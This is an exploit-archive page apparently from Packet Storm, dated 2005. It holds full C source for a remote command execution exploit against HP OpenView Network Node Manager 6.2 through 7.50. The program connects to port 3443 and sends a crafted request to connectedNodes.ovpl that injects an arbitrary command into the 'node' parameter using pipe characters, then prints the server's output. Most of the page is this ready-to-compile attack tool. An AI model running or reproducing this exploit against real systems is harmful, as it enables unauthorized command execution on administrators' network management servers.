what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HP_OV_NNM_RCE.c

HP_OV_NNM_RCE.c
Posted Aug 31, 2005
Authored by Lympex | Site l-bytes.net

Remote command execution exploit for HP OpenView Network Node Manager versions 6.2, 6.4, 7.01, and 7.50.

tags | exploit, remote
SHA-256 | 35f6fb2bbbf9a319cca337f6e91aa2660874027de25e497f6c79ccace01bedc0

HP_OV_NNM_RCE.c

Change Mirror Download
/*
##################################################################################
# HP OpenView Network Node Manager 6.2, 6.4, 7.01, 7.50 Remote Command Execution #
##################################################################################

Name: HP OV NNM Remote Command Execution Exploit
File: HP_OV_NNM_RCE.c
Description: Exploit
Author: Lympex
Contact:
+ Web: http://l-bytes.net
+ Mail: lympex[at]gmail[dot]com
Date: 30/08/2005
Extra: Compiled with Visual C++ 6.0

############################################################################
#SecurityTracker Alert ID: 1014791 #
#SecurityTracker URL: http://securitytracker.com/id?1014791 #
#CVE Reference: GENERIC-MAP-NOMATCH #
#Updated: Aug 25 2005 #
#Original Entry Date: Aug 25 2005 #
#Impact: Execution of arbitrary code via network, User access via network #
############################################################################

*/

//headers
#include <stdio.h>//In/Out
#include <winsock2.h>//sockets functions
#include <stdlib.h>//memory functions
#include <string.h>//strlen,strcat,strcpy

#pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"

#define Port 3443 //port for connect to HP OV NNM
#define SIZE 2048 //buffer size to receive the data

/*connect host:port*/
SOCKET Conecta(char *Host, short puerto)
{
/*struct for make the socket*/
WSADATA wsaData;
SOCKET Winsock;//listener socket
/*two structures for connect*/
struct sockaddr_in Winsock_In;
struct hostent *Ip;

/*start the socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*make*/
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

//check socket status
if(Winsock==INVALID_SOCKET)
{
/*exit*/
WSACleanup();
return -1;
}

/*complete the struct*/
Ip=gethostbyname(Host);
Winsock_In.sin_port=htons(puerto);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));

/*connect*/
if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
/*end*/
WSACleanup();
return -1;
}

return Winsock;
}

/*MASTER FUNCTION*/
int main(int argc, char *argv[])
{
/*the socket*/
SOCKET sock;
/*make the evil buffer to send the request*/
char evil_request[]="GET /OvCgi/connectedNodes.ovpl?node=a| ";
char evil_request2[]=" |";
char *evil;
/*to receive the data*/
char buf[SIZE];
unsigned int i;

printf("\n +[ HP OV NNM Remote Command Execution ]+ by Lympex");
printf("\nContact: lympex[at]gmail[dot]com & http://l-bytes.net");
printf("\n-----------------------------------------------------\n");

if(argc!=3)//HP_OV_NNM_RCE <host> <command>
{
printf("\n[+] Usage: %s <host> <command>",argv[0]);
printf("\nImportant: Do not include \x22<\x22 and \x22>\x22 chars\n");
return 0;
}

for(i=0;i<strlen(argv[2]);i++)
{
if(argv[2][i]=='<' || argv[2][i]=='>')
{
printf("\n[!] Error - You have included \x22<\x22 and/or \x22>\x22 chars\n");
return 1;
}
}

printf("\n[+] Connecting %s:%d...",argv[1],Port);

/*start the exploit*/
sock=Conecta(argv[1],Port);//connect
if(sock==-1)
{
printf("Error\n");
return 1;
}

printf("OK");

/*make the EVIL request*/
evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n");

//sends it
send(sock,evil,strlen(evil),0);

buf[recv(sock,buf,SIZE,0)]='\0';

//show the data
printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);

WSACleanup();
LocalFree(buf);
LocalFree(evil);
return 0;
}
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close